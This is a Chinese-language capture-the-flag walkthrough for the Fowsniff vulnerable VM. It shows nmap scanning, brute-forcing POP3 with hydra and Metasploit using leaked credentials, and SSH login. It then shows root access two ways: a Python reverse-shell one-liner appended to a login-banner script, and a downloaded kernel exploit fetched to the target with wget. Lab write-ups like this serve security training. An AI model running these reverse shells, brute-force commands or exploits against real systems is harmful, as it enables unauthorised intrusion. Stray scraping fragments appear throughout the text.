Fowsniff: 1靶機入侵

1、信息收集

1.存活主機掃描

arp-scan  -lhtml

發現192.168.1.13是目標靶機的IP地址python

2.端口掃描

接下來用nmap神器來掃描目標IP地址,命令以下:linux

root@kali2018:~# nmap -A  192.168.1.13web

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 01:18 ESTshell

Nmap scan report for 192.168.1.13ubuntu

Host is up (0.0014s latency).vim

Not shown: 996 closed ports瀏覽器

PORT    STATE SERVICE VERSIONapp

22/tcp  openssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)ssh

| ssh-hostkey:

|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)

|   256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)

|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)

80/tcp  openhttp    Apache httpd 2.4.18 ((Ubuntu))

| http-robots.txt: 1 disallowed entry

|_/

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-title: Fowsniff Corp - Delivering Solutions

110/tcp open  pop3    Dovecot pop3d

|_pop3-capabilities: AUTH-RESP-CODE UIDL SASL(PLAIN) PIPELINING USER CAPA TOP RESP-CODES

143/tcp open  imap    Dovecot imapd

|_imap-capabilities: have OK more IMAP4rev1 post-login listed capabilities LOGIN-REFERRALS SASL-IR Pre-login LITERAL+ IDLE AUTH=PLAINA0001 ENABLE ID

MAC Address: 08:00:27:1E:80:B0 (Oracle VirtualBox virtual NIC)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Network Distance: 1 hop

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

TRACEROUTE

HOP RTT     ADDRESS

1   1.38 ms 192.168.1.13

 

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 9.44 seconds

掃描結果顯示有4個端口開放,22(ssh),80(http)110(pop3),143(imap)

2、靶機入侵

1.先看看80端口會不會有收穫,打開瀏覽器訪問:

看起來像一個靜態HTML頁面,在頁面上向下滾動,有一個註釋信息:@fowsniffcorp

頁面上沒有發現什麼,繼續使用dirbnikto進行掃描也沒有什麼收穫

root@kali2018:~# dirb http://192.168.1.13

root@kali2018:~# nikto -h http://192.168.1.13

 

因而我Google了一番頁面上顯示的這個fowsniff corp

找到fowsniff twitter@fowsniffcorp),有一條粘滯的推文:

在打開連接地址https://pastebin.com/NrAqVeeX以後,頁面上顯示了網站郵箱泄露的郵件用戶和密碼。

密碼是MD5格式,使用sodm5https://www.somd5.com/batch.html)或hashcat能夠解密密碼:

如今咱們建立一個用戶名和密碼的字典,而後經過hydrapop3進行爆破。

首先,將全部用戶名粘貼到user.txt文件中保存,而後,將全部密碼粘貼到pass.txt文件中保存

也可使用msf來爆破pop3登陸,命令和配置以下:

msf > use auxiliary/scanner/pop3/pop3_login

msf auxiliary(scanner/pop3/pop3_login) > set rhosts  192.168.1.13

rhosts => 192.168.1.13

msf auxiliary(scanner/pop3/pop3_login) > set user_file /opt/user.txt

user_file => /opt/user.txt

msf auxiliary(scanner/pop3/pop3_login) > set pass_file /opt/pass.txt

pass_file => /opt/pass.txt

msf auxiliary(scanner/pop3/pop3_login) > set verbose false

verbose => false

msf auxiliary(scanner/pop3/pop3_login) > exploit

運行以後咱們找到了正確的憑證,「seina:scoobydoo2」,如圖:

經過hydra對郵箱進行爆破以下:

hydra -L users.txt -P pass.txt -f {IP} pop3

 

-L ~ username wordlist

-P ~ password wordlist

-f ~ stop cracking when valid user is found

root@kali2018:/opt# hydra -L user.txt -P pass.txt  -f 192.168.1.13  pop3

 能夠看到成功爆破出用戶名seina和對應的密碼scoobydoo2

接着咱們鏈接到靶機的pop3服務上,使用剛纔獲取的憑證進行登陸。登陸上以後,咱們查看下信息,發現有兩條信息,命令以下:

root@kali2018:/opt# nc 192.168.1.13 110

+OK Welcome to the Fowsniff Corporate Mail Server!

user seina

+OK

pass scoobydoo2

+OK Logged in.

list

+OK 2 messages:

1 1622

2 1280

使用list命令查看是否有郵件信息。咱們能夠看到有兩條消息,而後使用 retr [id]  用來讀取郵件。

咱們查看第一條信息的內容,發現它包含SSH的臨時密碼是「S1ck3nBluff + secureshell」

retr 1

+OK 1622 octets

Return-Path: <stone@fowsniff>

X-Original-To: seina@fowsniff

Delivered-To: seina@fowsniff

Received: by fowsniff (Postfix, from userid 1000)

        id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)

To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,

    mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,

    tegel@fowsniff

Subject: URGENT! Security EVENT!

Message-Id: <20180313185107.0FA3916A@fowsniff>

Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)

From: stone@fowsniff (stone)

 

Dear All,

 

A few days ago, a malicious actor was able to gain entry to

our internal email systems. The attacker was able to exploit

incorrectly filtered escape characters within our SQL database

to access our login credentials. Both the SQL and authentication

system used legacy methods that had not been updated in some time.

 

We have been instructed to perform a complete internal system

overhaul. While the main systems are "in the shop," we have

moved to this isolated, temporary server that has minimal

functionality.

 

This server is capable of sending and receiving emails, but only

locally. That means you can only send emails to other users, not

to the world wide web. You can, however, access this system via

the SSH protocol.

 

The temporary password for SSH is "S1ck3nBluff+secureshell"

 

You MUST change this password as soon as possible, and you will do so under my

guidance. I saw the leak the attacker posted online, and I must say that your

passwords were not very secure.

 

Come see me in my office at your earliest convenience and we'll set it up.

 

Thanks,

A.J Stone

 

 

 

 

 

接着查看第二條信息,信息中能夠看到發件人是baksteen@fowsniff,能夠推斷用戶名是baksteen

 

retr 2

+OK 1280 octets

Return-Path: <baksteen@fowsniff>

X-Original-To: seina@fowsniff

Delivered-To: seina@fowsniff

Received: by fowsniff (Postfix, from userid 1004)

    id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)

To: seina@fowsniff

Subject: You missed out!

Message-Id: <20180313185405.101CA1AC2@fowsniff>

Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)

From: baksteen@fowsniff

 

Devin,

 

You should have seen the brass lay into AJ today!

We are going to be talking about this one for a looooong time hahaha.

Who knew the regional manager had been in the navy? She was swearing like a sailor!

 

I don't know what kind of pneumonia or something you brought back with

you from your camping trip, but I think I'm coming down with it myself.

How long have you been gone - a week?

Next time you're going to get sick and miss the managerial blowout of the century,

at least keep it to yourself!

 

I'm going to head home early and eat some chicken soup.

I think I just got an email from Stone, too, but it's probably just some

"Let me explain the tone of my meeting with management" face-saving mail.

I'll read it when I get back.

 

Feel better,

 

Skyler

 

PS: Make sure you change your email password.

AJ had been telling us to do that right before Captain Profanity showed up.

接着咱們使用剛纔得到的憑證,也就是用戶名:baksteen  密碼:S1ck3nBluff+secureshell來登陸ssh

root@kali2018:/opt# ssh baksteen@192.168.1.13


3、權限提高

1.第一種權限提高

登陸成功。對系統進行一下枚舉,發現用戶baksteen屬於兩個不一樣的組。咱們嘗試找到屬於users組的文件,發現了一個腳本「cube.sh」,查找命令以下:

baksteen@fowsniff:~$ find / -group users -type f 2>/dev/null


咱們查看一下這個腳本文件的內容,發現它包含咱們ssh登錄後出現的界面信息,對照上圖ssh登陸成功後的截圖便知。

baksteen@fowsniff:~$ cd /opt/cube

baksteen@fowsniff:/opt/cube$ ls

baksteen@fowsniff:/opt/cube$ cat cube.sh


咱們使用vim打開該文件,並在文件結尾添加一行Python反彈shell的命令:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.21",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

如圖:

保存後,咱們嘗試執行該腳本,報錯,錯誤信息是「Python command is not found」。因而咱們在系統中查找Python,發現安裝的是Python3,如圖:

 

因此咱們修改反彈shell的命令爲Python3,以下:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

因爲咱們登陸到ssh時看到的bannercube.sh腳本包含的內容類似,因此咱們來查看下「etc/update-motd.d」目錄,查找運行改程序的可執行文件,發現了「00-header」這個文件運行這個shell腳本。

如今咱們退出ssh,而且在本地使用netcat設置監聽,而後咱們從新鏈接ssh,這樣的話,咱們的反彈shell就成功執行了

root@kali2018:/opt# nc -lvvp 1234

root@kali2018:~# ssh  baksteen@192.168.1.13 

一旦成功登陸,咱們就得到了一個root用戶的shell。咱們切換到root目錄,發現一個flag.txt的文件,查看文件便獲得了咱們的flag信息:

root@kali2018:/opt# nc -lvvp 1234

listening on [any] 1234 ...

192.168.1.13: inverse host lookup failed: Unknown host

connect to [192.168.1.21] from (UNKNOWN) [192.168.1.13] 50676

/bin/sh: 0: can't access tty; job control turned off

# id

uid=0(root) gid=0(root) groups=0(root)

# cd /root

# ls

Maildir

flag.txt

# cat flag.txt

   ___                        _        __   _             _

  / __|___ _ ___ _ _ _ __ _| |_ _  _| |__ _| |_(_)___ _ _  __| |

 | (__/ _ \ ' \/ _` | '_/ _` |  _| || | / _` |  _| / _ \ ' \(_-<_|

  \___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)

               |___/

 

 (_)

  |--------------

|&&&&&&&&&&&&&&|

  |    R O O T   |

  |    F L A G   |

|&&&&&&&&&&&&&&|

  |--------------

  |

  |

  |

  |

  |

  |

 ---

 

Nice work!

 

This CTF was built with love in every byte by @berzerk0 on Twitter.

 

Special thanks to psf, @nbulischeck and the whole Fofao Team.

 

#

 

2.第二種權限提高

在枚舉baksteen帳號的時候,咱們注意到內核目標靶機的系統內核爲4.4.0-116-generic,該內核容易受到本地權限提高的漏洞攻擊。目標系統中並無安裝GCC,能夠在攻擊機上編譯成功後的EXP,而後下載到目標靶機上執行。

baksteen@fowsniff:/opt/cube$ uname -a

 

https://www.exploit-db.com/exploits/44298/

 

root@kali2018:/opt# wget https://www.exploit-db.com/download/44298

--2019-02-13 02:50:28--https://www.exploit-db.com/download/44298

Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8

Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.

HTTP request sent, awaiting response... 200 OK

Length: 6021 (5.9K) [application/txt]

Saving to: ‘44298’

 

44298100%[===============================================================================>]   5.88K--.-KB/s    in 0s     

 

2019-02-13 02:50:32 (27.4 MB/s) - ‘44298’ saved [6021/6021]

 

root@kali2018:/opt# ls

44298  pass.txtuser.txt

root@kali2018:/opt# cp 44298

cp: missing destination file operand after '44298'

Try 'cp --help' for more information.

root@kali2018:/opt# cp 44298  44298.c

root@kali2018:/opt# gcc -o  exploit 44298.c

root@kali2018:/opt# ls

44298  44298.cexploit  pass.txt  user.txt

root@kali2018:/opt# num.sh  linuxprivchecker.py

baksteen@fowsniff:/opt/cube$

baksteen@fowsniff:/opt/cube$ wget http://192.168.1.21:81/exploit

--2019-02-13 02:53:41--http://192.168.1.21:81/exploit

Connecting to 192.168.1.21:81... connected.

HTTP request sent, awaiting response... 200 OK

Length: 17880 (17K) [application/octet-stream]

Saving to: 鈥榚xploit

 

exploit100%[====================================================================================>]  17.46K--.-KB/s    in 0.002s 

 

2019-02-13 02:53:41 (8.29 MB/s) - 鈥榚xploitsaved [17880/17880]

 

baksteen@fowsniff:/opt/cube$ ls

cube.sh  exploitLinEnum.sh  linuxprivchecker.py

baksteen@fowsniff:/opt/cube$ chmod +x exploit

baksteen@fowsniff:/opt/cube$ ./exploit

task_struct = ffff88001ebe8000

uidptr = ffff88001eb3e184

spawning root shell

root@fowsniff:/opt/cube# id

uid=0(root) gid=0(root) groups=0(root),100(users),1001(baksteen)

root@fowsniff:/opt/cube#

 

<wiz_tmp_tag id="wiz-table-range-border" contenteditable="false" style="display: none;">

相關文章
相關標籤/搜索